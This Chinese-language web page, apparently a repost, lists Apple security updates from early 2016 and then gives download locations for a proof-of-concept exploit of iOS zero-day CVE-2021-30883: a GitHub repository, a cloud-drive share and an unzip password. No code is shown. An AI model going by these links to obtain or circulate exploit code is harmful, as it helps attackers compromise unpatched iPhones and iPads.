Safari 浏览器 9.1OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11.42016 年 3 月 21 日
OS X El Capitan v10.11.4 和安全性更新 2016-002OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11 至 v10.11.32016 年 3 月 21 日
Xcode 7.3OS X El Capitan v10.11 及更高版本2016 年 3 月 21 日
Apple tvOS 9.2Apple TV(第 4 代)2016 年 3 月 21 日
watchOS 2.2Apple Watch Sport、Apple Watch、Apple Watch Edition 和 Apple Watch Hermès2016 年 3 月 21 日
iOS 9.3iPhone 4s 及更新机型、iPod touch(第 5 代)及更新机型、iPad 2 及更新机型2016 年 3 月 21 日
Apple Software Update 2.2Windows 7 及更高版本2016 年 3 月 9 日
Apple TV 7.2.1Apple TV(第 3 代)2016 年 2 月 25 日
Apple tvOS 9.1.1Apple TV(第 4 代)2016 年 1 月 25 日
Safari 浏览器 9.0.3OS X Mavericks v10.9.5、OS X Yosemite v10.10.5 和 OS X El Capitan v10.11.32016 年 1 月 19 日
OS X El Capitan 10.11.3 和安全性更新 2016-001OS X Mavericks v10.9.5、OS X Yosemite v10.10.5、OS X El Capitan v10.11 至 v10.11.22016 年 1 月 19 日
iOS 9.2.1iPhone 4s 及更新机型、iPod touch(第 5 代)及更新机型、iPad 2 及更新机型2016 年 1 月 19 日
QuickTime 7.7.9Windows 7 和 Windows Vista2016 年 1 月 7 日

有关更早的安全性更新的信息,请参阅以下文稿:

cve-2021-30883 POC下载地址

Apple发布紧急iPhone和iPad更新以修补新的零日漏洞

①GitHub

github.com/saaramar/IOMFB_integer_overflow_poc

②云中转网盘:

yunzhongzhuan.com/#sharefile=xxpQYUFA_14015
解压密码: www.ddosi.org

Apple发布紧急iPhone和iPad更新以修补新的零日漏洞

转载请注明出处及链接

Leave a Reply

您的电子邮箱地址不会被公开。 必填项已用*标注

3 × 3 =